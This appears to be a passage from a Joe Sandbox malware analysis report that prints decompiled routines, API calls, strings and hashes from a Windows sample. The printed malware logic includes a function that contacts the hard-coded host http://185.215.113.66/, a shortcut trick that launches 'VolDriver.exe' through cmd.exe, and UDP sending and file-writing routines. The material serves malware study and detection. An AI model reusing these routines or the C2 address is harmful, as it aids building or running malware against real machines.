                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep$wsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s%s$http://185.215.113.66/
                                                                                                                                                                                                                                                                                    • API String ID: 3195947292-2646931437
                                                                                                                                                                                                                                                                                    • Opcode ID: c2637b0e451e789f276395e354baee512bf947ab07dd5ce8b1a8847efd57730a
                                                                                                                                                                                                                                                                                    • Instruction ID: 33448fd8f16b6151abdcaf40b6ca2b1b809edec1cb8df60be6306fd5b5127b81
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2637b0e451e789f276395e354baee512bf947ab07dd5ce8b1a8847efd57730a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22213B70E00318AFCB50DF64DD45BDEBBB4AF09304F1080ABD24DB6281DB785A898F5A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E0040DBD0(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                                                                                                                                                                                                                    				short _v6;
                                                                                                                                                                                                                                                                                    				short _v10;
                                                                                                                                                                                                                                                                                    				short _v14;
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v20;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				int* _v24;
                                                                                                                                                                                                                                                                                    				char _v25;
                                                                                                                                                                                                                                                                                    				char _v29;
                                                                                                                                                                                                                                                                                    				int* _v52;
                                                                                                                                                                                                                                                                                    				char _v53;
                                                                                                                                                                                                                                                                                    				short _t30;
                                                                                                                                                                                                                                                                                    				short _t35;
                                                                                                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                                                                                                    				int* _t45;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                    				void* _t60;
                                                                                                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                                                                                                    				long _t67;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = _a4;
                                                                                                                                                                                                                                                                                    				_t64 = __eax;
                                                                                                                                                                                                                                                                                    				_t30 = 0;
                                                                                                                                                                                                                                                                                    				_v25 = 0;
                                                                                                                                                                                                                                                                                    				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					return _t30;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t60 = __eax + 4;
                                                                                                                                                                                                                                                                                    					_t45 = E00408B20(_t60);
                                                                                                                                                                                                                                                                                    					_t6 =  &(_t45[1]); // 0x4
                                                                                                                                                                                                                                                                                    					_v24 = _t45;
                                                                                                                                                                                                                                                                                    					 *_t45 = _t64;
                                                                                                                                                                                                                                                                                    					memcpy(_t6, _a8, _t64);
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_v10 = 0;
                                                                                                                                                                                                                                                                                    					_v6 = 0;
                                                                                                                                                                                                                                                                                    					_t35 = _a16;
                                                                                                                                                                                                                                                                                    					_v20 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#9(_t35);
                                                                                                                                                                                                                                                                                    					_v22 = _t35;
                                                                                                                                                                                                                                                                                    					_v20 = _a12;
                                                                                                                                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						_v29 = 1;
                                                                                                                                                                                                                                                                                    						E00408C70(_t45);
                                                                                                                                                                                                                                                                                    						return _v29;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t38 = _a4;
                                                                                                                                                                                                                                                                                    							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                                                                                                                                                                                                                    							_t67 = _t38;
                                                                                                                                                                                                                                                                                    							if(_t67 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                                                                                                                                                                                                                    							_t60 = _t60 - _t67;
                                                                                                                                                                                                                                                                                    							_t45 = _t45 + _t67;
                                                                                                                                                                                                                                                                                    							if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v53 = 1;
                                                                                                                                                                                                                                                                                    								E00408C70(_v52);
                                                                                                                                                                                                                                                                                    								return _v53;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    							E00408C70(_v52);
                                                                                                                                                                                                                                                                                    							_t30 = _v53;
                                                                                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t45 = _v52;
                                                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x0040dbd9
                                                                                                                                                                                                                                                                                    0x0040dbde
                                                                                                                                                                                                                                                                                    0x0040dbe0
                                                                                                                                                                                                                                                                                    0x0040dbe3
                                                                                                                                                                                                                                                                                    0x0040dbe9
                                                                                                                                                                                                                                                                                    0x0040dcea
                                                                                                                                                                                                                                                                                    0x0040dcf0
                                                                                                                                                                                                                                                                                    0x0040dc0d
                                                                                                                                                                                                                                                                                    0x0040dc0d
                                                                                                                                                                                                                                                                                    0x0040dc16
                                                                                                                                                                                                                                                                                    0x0040dc1d
                                                                                                                                                                                                                                                                                    0x0040dc21
                                                                                                                                                                                                                                                                                    0x0040dc25
                                                                                                                                                                                                                                                                                    0x0040dc27
                                                                                                                                                                                                                                                                                    0x0040dc2e
                                                                                                                                                                                                                                                                                    0x0040dc32
                                                                                                                                                                                                                                                                                    0x0040dc36
                                                                                                                                                                                                                                                                                    0x0040dc3a
                                                                                                                                                                                                                                                                                    0x0040dc3f
                                                                                                                                                                                                                                                                                    0x0040dc4b
                                                                                                                                                                                                                                                                                    0x0040dc50
                                                                                                                                                                                                                                                                                    0x0040dc59
                                                                                                                                                                                                                                                                                    0x0040dc5e
                                                                                                                                                                                                                                                                                    0x0040dc64
                                                                                                                                                                                                                                                                                    0x0040dcc0
                                                                                                                                                                                                                                                                                    0x0040dcc1
                                                                                                                                                                                                                                                                                    0x0040dcc6
                                                                                                                                                                                                                                                                                    0x0040dcd8
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc66
                                                                                                                                                                                                                                                                                    0x0040dc78
                                                                                                                                                                                                                                                                                    0x0040dc7e
                                                                                                                                                                                                                                                                                    0x0040dc83
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc8d
                                                                                                                                                                                                                                                                                    0x0040dc93
                                                                                                                                                                                                                                                                                    0x0040dc95
                                                                                                                                                                                                                                                                                    0x0040dc99
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc9b
                                                                                                                                                                                                                                                                                    0x0040dca0
                                                                                                                                                                                                                                                                                    0x0040dca5
                                                                                                                                                                                                                                                                                    0x0040dcb7
                                                                                                                                                                                                                                                                                    0x0040dcb7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dc99
                                                                                                                                                                                                                                                                                    0x0040dcba
                                                                                                                                                                                                                                                                                    0x0040dcde
                                                                                                                                                                                                                                                                                    0x0040dce3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dcbc
                                                                                                                                                                                                                                                                                    0x0040dcba
                                                                                                                                                                                                                                                                                    0x0040dc64
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DC27
                                                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 0040DC50
                                                                                                                                                                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040DC78
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DC8D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                                                    • Opcode ID: 64e6edf90043f3ef5267befaaf6f5bc9513a580fe3cc4bc2b57856c41bc94de3
                                                                                                                                                                                                                                                                                    • Instruction ID: 1900bc5e36bec968277d7fd378407ddad580e15f752f42e7870c86cf4b77d333
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64e6edf90043f3ef5267befaaf6f5bc9513a580fe3cc4bc2b57856c41bc94de3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F31E1766083009FD710DFA9D880A9BB7E4AF89714F04456EF99897382D674CD08CBEB
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                    			E00404D70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				short _v540;
                                                                                                                                                                                                                                                                                    				char* _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                    				_t37 =  &_v12;
                                                                                                                                                                                                                                                                                    				__imp__CoCreateInstance(0x410338, 0, 1, 0x410328, _t37);
                                                                                                                                                                                                                                                                                    				_v8 = _t37;
                                                                                                                                                                                                                                                                                    				if(_v8 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                    					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x415124, 0x415124);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                                                                                                                                                                                                                    					_t42 =  *_v12;
                                                                                                                                                                                                                                                                                    					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410348,  &_v16);
                                                                                                                                                                                                                                                                                    					if(_v8 >= 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00404d7b
                                                                                                                                                                                                                                                                                    0x00404d81
                                                                                                                                                                                                                                                                                    0x00404d93
                                                                                                                                                                                                                                                                                    0x00404d99
                                                                                                                                                                                                                                                                                    0x00404da0
                                                                                                                                                                                                                                                                                    0x00404dc6
                                                                                                                                                                                                                                                                                    0x00404de0
                                                                                                                                                                                                                                                                                    0x00404ded
                                                                                                                                                                                                                                                                                    0x00404df3
                                                                                                                                                                                                                                                                                    0x00404df6
                                                                                                                                                                                                                                                                                    0x00404e06
                                                                                                                                                                                                                                                                                    0x00404e1b
                                                                                                                                                                                                                                                                                    0x00404e33
                                                                                                                                                                                                                                                                                    0x00404e3a
                                                                                                                                                                                                                                                                                    0x00404e54
                                                                                                                                                                                                                                                                                    0x00404e62
                                                                                                                                                                                                                                                                                    0x00404e62
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404e70
                                                                                                                                                                                                                                                                                    0x00404e75

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00404D7B
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00410338,00000000,00000001,00410328,?), ref: 00404D93
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404DC6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 00404DBA
                                                                                                                                                                                                                                                                                    • %windir%\System32\cmd.exe, xrefs: 00404DCF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                                                    • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                                                                                                                                                                                                                    • API String ID: 2038452267-2473591295
                                                                                                                                                                                                                                                                                    • Opcode ID: eadea155d48dcf4b5dc2eddb40bd72b199a5ff6e8701186b8fb8f04e5b27ea74
                                                                                                                                                                                                                                                                                    • Instruction ID: 2a49fd5d28e8ccd51fed007e1346deb4ba552c81a06522ba7ecdc7d03be8f695
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eadea155d48dcf4b5dc2eddb40bd72b199a5ff6e8701186b8fb8f04e5b27ea74
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B31B775A40208EFCB04DF98D885EDEB7B5FF88704F208199E615A72A0C674AE81CB54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 00405BA8
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(C:\Users\user\AppData\Local\Temp\2550821914.exe), ref: 00405BB3
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00405BD8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405910: SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00405BD2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\2550821914.exe, xrefs: 00405BAE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\2550821914.exe
                                                                                                                                                                                                                                                                                    • API String ID: 459949847-722150251
                                                                                                                                                                                                                                                                                    • Opcode ID: 6cd694fec373ba90f407f83b999d67f828c72ca168007c4fd3c8841ffbaea35b
                                                                                                                                                                                                                                                                                    • Instruction ID: 8e1ceaac5e3c15648392f9261d8fa4bd32f1c3ccaf3a14fdf2aec8c3e2deeebf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd694fec373ba90f407f83b999d67f828c72ca168007c4fd3c8841ffbaea35b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E048B5940208FBD704EBE0DD0EB9D7774DB05305F1041B5F50566291DAF99E80CB59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409660(void* __eax) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if( *0x416e2c == 0) {
                                                                                                                                                                                                                                                                                    					return __eax;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t36 =  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    				_v12 = _t36 << 3;
                                                                                                                                                                                                                                                                                    				_t38 = E00408B20(_v12);
                                                                                                                                                                                                                                                                                    				_v8 = _t38;
                                                                                                                                                                                                                                                                                    				__eflags = _v8;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                                                    						__eflags = _v20 -  *0x416e2c; // 0x0
                                                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v20 * 4)) + 4));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v20 * 4)) + 8));
                                                                                                                                                                                                                                                                                    						_t65 = _v20 + 1;
                                                                                                                                                                                                                                                                                    						__eflags = _t65;
                                                                                                                                                                                                                                                                                    						_v20 = _t65;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v16 = CreateFileW(0x416be8, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                                    					__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                                                    					if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                                                                                                                                                                                                                    						FlushFileBuffers(_v16);
                                                                                                                                                                                                                                                                                    						CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InterlockedExchange(0x4143b4, 0x3d);
                                                                                                                                                                                                                                                                                    					return E00408C70(_v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t38;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040966d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409674
                                                                                                                                                                                                                                                                                    0x0040967c
                                                                                                                                                                                                                                                                                    0x00409683
                                                                                                                                                                                                                                                                                    0x0040968b
                                                                                                                                                                                                                                                                                    0x0040968e
                                                                                                                                                                                                                                                                                    0x00409692
                                                                                                                                                                                                                                                                                    0x00409698
                                                                                                                                                                                                                                                                                    0x004096aa
                                                                                                                                                                                                                                                                                    0x004096ad
                                                                                                                                                                                                                                                                                    0x004096b3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004096c8
                                                                                                                                                                                                                                                                                    0x004096de
                                                                                                                                                                                                                                                                                    0x004096a4
                                                                                                                                                                                                                                                                                    0x004096a4
                                                                                                                                                                                                                                                                                    0x004096a7
                                                                                                                                                                                                                                                                                    0x004096a7
                                                                                                                                                                                                                                                                                    0x004096fe
                                                                                                                                                                                                                                                                                    0x00409701
                                                                                                                                                                                                                                                                                    0x00409705
                                                                                                                                                                                                                                                                                    0x00409719
                                                                                                                                                                                                                                                                                    0x00409723
                                                                                                                                                                                                                                                                                    0x0040972d
                                                                                                                                                                                                                                                                                    0x0040972d
                                                                                                                                                                                                                                                                                    0x0040973a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409749
                                                                                                                                                                                                                                                                                    0x0040974f

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416BE8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004096F8
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409719
                                                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32 ref: 00409723
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040972D
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(004143B4,0000003D), ref: 0040973A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 442028454-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ffe5f978a5d75daa98a19236d1bc63fd9fce486f64e544f4dc3e6b78cafa0eaa
                                                                                                                                                                                                                                                                                    • Instruction ID: 09bb8ad8a153661e876b0a8aa7cfca9b830c2f60f8f6b2a0515d583d03b87c58
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffe5f978a5d75daa98a19236d1bc63fd9fce486f64e544f4dc3e6b78cafa0eaa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11314CB8A00208EFCB14DF94D845F9EB7B1BB48300F20C669E515A7391C775AE51CF59
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                                                                    			E00407570(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				L0040EDFE();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                                                                                                                                                                                                                    				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x0040757b
                                                                                                                                                                                                                                                                                    0x0040757e
                                                                                                                                                                                                                                                                                    0x0040758a
                                                                                                                                                                                                                                                                                    0x0040758d
                                                                                                                                                                                                                                                                                    0x00407599
                                                                                                                                                                                                                                                                                    0x0040759c
                                                                                                                                                                                                                                                                                    0x004075a8
                                                                                                                                                                                                                                                                                    0x004075ab
                                                                                                                                                                                                                                                                                    0x004075b7
                                                                                                                                                                                                                                                                                    0x004075ba
                                                                                                                                                                                                                                                                                    0x004075c6
                                                                                                                                                                                                                                                                                    0x004075cb
                                                                                                                                                                                                                                                                                    0x004075ce
                                                                                                                                                                                                                                                                                    0x004075dc

                                                                                                                                                                                                                                                                                    APIs
